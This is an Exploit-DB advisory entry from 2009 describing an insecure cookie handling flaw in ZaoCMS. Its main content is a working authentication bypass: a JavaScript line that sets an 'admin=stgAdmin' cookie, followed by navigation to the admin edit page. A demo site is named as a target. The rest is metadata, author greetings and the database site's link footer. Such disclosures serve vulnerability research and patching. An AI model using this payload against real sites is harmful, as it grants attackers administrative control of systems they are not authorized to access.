ZaoCMS - Insecure Cookie Handling

EDB-ID:

8763

CVE:

EDB Verified:

Author:

ThE g0bL!N

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-05-21

Vulnerable App:

--------------------------------------------------------------
ZaoCMS Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
---------------------------------------------------------------
Exploit:
---------
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
-------
http://demo.zaocms.com/admin/login.php
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-21]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services